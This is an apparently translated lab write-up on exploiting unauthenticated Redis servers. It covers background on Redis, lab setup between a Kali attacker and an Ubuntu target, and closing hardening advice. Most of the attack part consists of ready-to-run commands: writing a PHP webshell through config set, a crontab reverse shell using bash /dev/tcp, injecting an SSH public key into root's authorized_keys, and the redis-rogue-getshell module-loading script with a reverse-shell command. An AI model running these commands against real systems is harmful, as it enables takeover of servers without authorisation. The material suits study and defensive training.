Experimental purpose
Reproduce and analyze the [4-unacc] redis unauthorized access vulnerability, and exploit this vulnerability in multiple ways to achieve the effect of rebounding the shell.
Skill growth
Through this experiment, you can understand the redis unauthorized access vulnerability and learn the famous Redis unauthorized access vulnerability.
Preliminary knowledge
What is Redis
Generally speaking, there are several current database classifications, including SQL (relational database)/NoSQL (non-relational database), key-value database, etc. Redis is a single-threaded NoSQL database, and the classification standards are also different. Redis It is essentially a key-value database, but it absorbs some of the advantages of relational databases while maintaining the simplicity and speed of key-value databases.
It is mainly used for data caching. Generally, the layer between the application and database of large websites is Redis. For example, in the page search function of Jingdong Mall, the first layer of query that users come into contact with is the Redis data cache layer. Data that cannot be found in the cache is then entered into the database for query. Caching hotspot data in Redis can protect the database and improve query efficiency.
NoSQL generally refers to non-relational databases. With the rise of Internet web2.0 websites, traditional relational databases have become unable to handle web2.0 websites, especially ultra-large-scale and highly concurrent SNS type web2.0 purely dynamic websites, and many insurmountable problems have arisen. Non-relational databases have developed very rapidly due to their own characteristics. NoSQL databases were created to solve the challenges brought by large-scale data collections and multiple data types, especially big data application problems.
Redis stores data in memory. Due to its fast content access speed, redis is widely used in Internet projects.
Advantages of redis: fast access speed. Officially, the reading speed will reach 300,000 times per second, and the writing speed will be around 100,000 times per second. The specific limitations are limited to the hardware.
Disadvantages: Not good enough for persistence support.
Therefore, redis is generally not used as the main database storage for data, and is generally used in conjunction with traditional relational databases.
Redis is an open source, high-performance key-value database developed in C language. It provides a variety of key-value data types to adapt to storage needs in different scenarios. The key-value data types supported by Redis so far are as follows:
String type Hash type List type Set type
Application scenarios of redis
Caching (data query, short connection, news content, product content, etc.). (Most used) Session separation in distributed cluster architecture. Chat room’s online friends list. Task queue. (Flash sale, rush sale, 12306, etc.) Application rankings. Website visit statistics. Data expiration processing (accurate to milliseconds)
Vulnerability Affected Versions
Redis 2.x, 3.x, 4.x, 5.x
Redis deployment
The first is the installation of the redis client. If kali does not come with a client, it needs to be installed manually. Just use the following command:
wget http://download.redis.io/redis-stable.tar.gz tar -zxvf redis-stable.tar.gz cd redis-stable/ make ls cp src/redis-cli /usr/bin/
Next is the installation of the redis server, which is installed on the target machine:
wget http://download.redis.io/releases/redis-5.0.5.tar.gz tar -zxvf redis-5.0.5.tar.gz mv redis-5.0.5/redis (move to the root directory) cd /redis make vim redis.conf
Find the location shown in the picture below
Unauthorized access to redis will occur in two situations:
Without setting password authentication (usually empty), redis is bound to 0.0.0.0
When password authentication is not set (usually empty), redis is not bound to any address (any IP can access it at this time), and the protection mode is turned off.
Any one of these situations can be used; press i to modify, and after modification press esc to exit :wq
cd src Temporarily turn off the firewall systemctl stop firewalld or set the firewall policy for 6379 cp /redis/src/redis-server /usr/bin/ cd..
The configuration file will take effect only after restarting: redis-server redis.conf (executed in the redis.conf file directory)
Done, switch to kali
redis-cli -h target machine IP -p 6379
(1) Principle
By default, Redis will be bound to 0.0.0.0:6379. If no relevant policies are adopted, such as adding firewall rules to prohibit access from other untrusted source IPs, etc., this will expose the Redis service to the public network. If no password authentication is set (usually empty), it will cause any user to access Redis without authorization and read Redis data if they can access the target server.
The attacker can use the config command provided by Redis itself to write files without authorized access to Redis. The attacker can successfully write his ssh public key to the authorized_keys file in the /root/.ssh folder of the target server. , and then you can directly use the ssh service to log in to the target server using only the corresponding private key.
(2) Conditions
redis is bound to 0.0.0.0:6379, and no firewall rules are added to prevent other untrusted source IP access and other related security policies, directly exposed to the public network
If password authentication is not set (usually empty), you can remotely log in to the redis service without a password.
(3) Vulnerability hazards
Attackers can access internal data without authentication, which may lead to the leakage of sensitive information. Hackers can also perform malicious operations to clear all data.
An attacker can write a backdoor program to the disk through the data backup function
In the most serious case, if Redis is running as root, a hacker can write the SSH public key file to the root account and directly log in to the victim server through SSH.
Utilization process
nmap -A -p 6379 –script redis-info ip #Scan target redis info ./redis-cli -h 192.168.1.111 192.168.1.111:6379> info keys * #View all keys get key_name #View the value of key, such as get password flushall #Delete all data del key #Delete the data with key key
Some servers reported errors
-ERR Changing directory: No such file or directory
Then we create the /root/.ssh directory on the redis server, simulating that in reality it is very likely that the other party logs in with a key and has this directory;
It may not be that the Linux server is not using a key to log in, but it may be that the target is a Windows server. There must be no /root/.ssh directory. You can use
info
Wait for commands to collect target information and confirm its operating system for further penetration.
Also for
(error) ERR Changing directory: Permission denied
Error, you can try to write a Trojan in its WEB service directory to get shell or write a scheduled task in crontab to rebound the shell, etc.
(1)Write webshell
Conditions:
Know the absolute path to the web root directory
The redis permission is not root, but it has web directory write permission.
Process:
First confirm that there is an unauthorized access vulnerability in redis and obtain the web root directory
Connect to the redis server: redis-cli.exe -h [ip] -p [port]
Enter the root directory: config set dir [absolute path to root directory]
Create a script file: config set dbfilename shell.php
Write command: set webshell "\r\
\r\
\r\
\r\
"
Save: save
Just access shell.php
Related links: https://blog.csdn.net/weixin_60719780/article/details/129310371
https://blog.csdn.net/qq_56289291/article/details/125645955
(2) Write a scheduled task rebound shell in crontab
Conditions:
centos: garbled characters will appear when redis writes content to the task plan file, and centos will ignore the garbled characters.
Permission to write scheduled tasks
Process:
kali listening port: nc -lvvp 8888 Generate scheduled task configuration file redis-cli -h target machine's ip -p 6379 set d "\ \ */1 * * * * /bin/bash -i> & amp;/dev/tcp/192.168.23.129/8888 0> & amp;1\ \ " - Set up a rebound shell script , the key name is d config set dir /var/spool/cron - Change the working directory of redis to /var/spool/cron. This directory distinguishes each user's scheduled tasks by account. The root user's scheduled tasks are saved with the root file name. config set dbfilename root - set file name save - Save the contents of key d to the /var/spool/cron/root file
(3) Write the ssh public key and obtain root permissions
Conditions:
I have used the ssh key to log in to the server, and there is this /root/.ssh/ directory
Use root privileges
SSH key login enabled
Process:
Use kali to generate ssh public key: ssh-keygen -t rsa Write the public key to txt: (echo -e "\ \ "; cat ~/.ssh/id_rsa.pub; echo -e "\ \ ") > ./ssh.txt Write txt to redis: cat ./ssh.txt | redis-cli -h 192.168.0.2 -x set ssh redis-cli -h 192.168.0.2 config set dir /root/.ssh/ save Local private key connection: ssh -i /root/.ssh/id_rsa [email protected]
(4) Automatic RCE script
(1) Any command execution: https://github.com/vulhub/redis-rogue-getshell
Execute the following code in the script directory
cd RedisModulesSDK/ make python3 redis-master.py -r 192.168.0.2 -p 6379 -L 192.168.0.4 -P 8888 -f RedisModulesSDK/exp.so -c "bash -c 'bash -i > & amp; /dev/tcp/192.168. 0.4/6666 0> & amp;1'"
Vulnerability description
Redis is an open source log-type, Key-Value database written in ANSI C language, supports network, and can be memory-based and persistent. Redis provides APIs in multiple languages. Redis uses port 6379 by default
The reason for the Redis unauthorized vulnerability is that Redis uses port 6379 by default, and Redis has an empty password by default and allows remote connections by default. Some administrators did not change its default port after installing Redis. And if a password is not set, hackers can write arbitrary files through the Redis database to escalate privileges and control the server.
Unauthorized access to Redis In versions earlier than 4.x/5.0.5, we can use the master/slave mode to load remote modules and execute arbitrary commands through dynamic link libraries.
Vulnerability hazard:
An attacker can use this vulnerability to perform remote command execution or even reverse shell
Vulnerability Affected Versions
Unauthorized access to Redis under versions earlier than 4.x/5.0.5
Experimental environment
Attack aircraft:
System Category: Kali Linux
Kernel version: Kali2020.1_x64
Attacking machine IP: 192.168.0.4
Target machine:
System category: Ubuntu
Target IP: 192.168.0.2
Kernel version: Ubuntu_16.04
Software version: redis-5.0.5
Environment setup
Redis deployment
The first is the installation of the redis client. The new version of kali does not come with a client and needs to be installed manually. I have already set up the platform and there is no need to install it again.
Just use the following command:
wget http://download.redis.io/redis-stable.tar.gz tar -zxvf redis-stable.tar.gz cd redis-stable/ make ls cp src/redis-cli /usr/bin/
Next is the installation of the redis server. I have already completed the installation. There is no need to build it again. It is installed on the target machine Ubuntu:
wget http://download.redis.io/releases/redis-5.0.5.tar.gz tar -zxvf redis-5.0.5.tar.gz mv redis-5.0.5/redis (move to the root directory) cd /redis make vim redis.conf
Find the location shown in the picture below
There are two situations where unauthorized access to redis may occur.
1. Without setting password authentication (usually empty), redis is bound to 0.0.0.0
2. When password authentication is not set (usually empty), redis is not bound to any address (any IP can access it at this time), and the protection mode needs to be turned off.
Any one of these situations is acceptable. The second one is used in the experimental environment; press i to modify. After modification, press esc to exit :wq
cd src cp /redis/src/redis-server /usr/bin/ cd..
The configuration file will take effect only after restarting: redis-server redis.conf (executed in the redis.conf file directory) Start the redis server to complete
switch to kali
redis-cli -h 192.168.0.2 -p 6379
This completes the environment installation
Vulnerability verification
Set up
The connection is successful
You can collect information first
Info collects target information
View the key-value pairs in the database keys *
And you can use (use with caution) this command to clear the database Flushall
Or del key deletes the data with the key key
Since we do not have a web root directory here, we use the second method to write a scheduled task rebound shell in crontab. When redis writes content to the task plan file, garbled characters will appear. Centos will ignore the garbled characters. This is an Ubuntu system, so it will not succeed.
Switch to the kali virtual machine and use to open a listening port: nc -lvvp 6666
Open another kali terminal
Generate scheduled task configuration file
redis-cli -h 192.168.0.2 -p 6379 set d "\ \ */1 * * * * /bin/bash -i> & amp;/dev/tcp/192.168.0.4/6666 0> & amp;1\ \ " - Set rebound shell script , the key name is d config set dir /var/spool/cron - Change the working directory of redis to /var/spool/cron. This directory distinguishes each user's scheduled tasks by account. The root user's scheduled tasks are saved with the root file name. config set dbfilename root - set file name save - Save the contents of key d to the /var/spool/cron/root file to rebound the shell, which does not apply here.
Use the third method:
Use kali to generate ssh public key: ssh-keygen -t rsa
Enter the default save path in the first place, overwrite it with y in the second place, set a new password in the third place, and re-enter the password in the fourth place.
Write the public key to txt:
(echo -e "\ \ "; cat ~/.ssh/id_rsa.pub; echo -e "\ \ ") > ./ssh.txt Write txt to redis: cat ./ssh.txt | redis-cli -h 192.168.0.2 -x set ssh redis-cli -h 192.168.0.2 config set dir /root/.ssh/ config set dbfilename authorized_keys save
Local private key connection: ssh -i /root/.ssh/id_rsa [email protected]
Just enter the password you set above here.
Here we directly use the fourth method
Enter the root directory of kali
cd redis-rogue-getshell-master/
Enter the redis-rogue-getshell-master/ directory
python3 redis-master.py -r 192.168.0.2 -p 6379 -L 192.168.0.4 -P 8888 -f RedisModulesSDK/exp.so -c "id"
Arbitrary command execution exists and verification is vulnerable.
Rebound shell
Kali starts listening on port 6666
Enter the root directory of kali cd redis-rogue-getshell-master/ Enter the redis-rogue-getshell-master/ directory and execute the following command python3 redis-master.py -r 192.168.0.2 -p 6379 -L 192.168.0.4 -P 8888 -f RedisModulesSDK/exp.so -c "bash -c 'bash -i > & amp; /dev/tcp/192.168. 0.4/6666 0> & amp;1'"
Vulnerability Analysis
Conditions for vulnerability generation:
.redis is bound to 0.0.0.0:6379, and no firewall rules are added to prevent other untrusted source IP access and other related security policies, and it is directly exposed to the public network.
.If password authentication is not set (default is empty), you can remotely log in to the redis service without a password.
Principle of file writing
Because after redis-cli remotely connects to redis, in addition to viewing the key-value pairs in the memory, you can also use commands such as config set dir xxx, config set dbfilename xxx, etc. If you have sufficient permissions, you can write any content in any path. If dbfilename is specified as a directory in the web website to generate a webshell by writing specific content, and if dbfilename is specified as the directory where the ssh public key is stored, a vulnerability in ssh remote login will arise…
Bug fix
Some precautions are as follows:
1. Prohibit some high-risk commands
Modify the redis.conf file and add
rename-command FLUSHALL “”
rename-command CONFIG “”
rename-command EVAL “”
To disable remote modification of DB file address
2. Run the Redis service with low permissions
Create a separate user and home directory for the Redis service, and configure it to prohibit login
$ groupadd -r redis & amp; & amp; useradd -r -g redis redis
It is very dangerous to run the redis service with root privileges.
3. Add password verification for Redis
Modify the redis.conf file and add
requirepass mypassword
4. Disable external network access to Redis
Modify the redis.conf file, add or modify it, so that the Redis service is only available on the current host
bind 127.0.0.1
The above demonstration illustrates the bad results of not using bind. Bind 127.0.0.1 can effectively restrict external network access to redis.
5. Ensure the security of the authorized_keys file
For security, you should prevent other users from adding new public keys.
Set the permissions of authorized_keys to be read-only for the owner, and other users will not have any permissions:
$ chmod 400 ~/.ssh/authorized_keys
To ensure that the permissions of authorized_keys will not be changed, you also need to set the immutable bit permissions of the file:
# chattr + i ~/.ssh/authorized_keys
However, users can also rename ~/.ssh and create a new ~/.ssh directory and authorized_keys file. To avoid this, set the immutable bit permissions on ~./ssh:
# chattr + i ~/.ssh
Note: If you need to add a new public key, you need to remove the immutable bit permission of authorized_keys. Then, after adding the new public key, follow the steps above to re-add the immutable bit permissions.
This is very important. The last way to write the public key is to use this to write a file to achieve SSH connection to the server getshell.
6. Modify the default port
7. Set firewall policy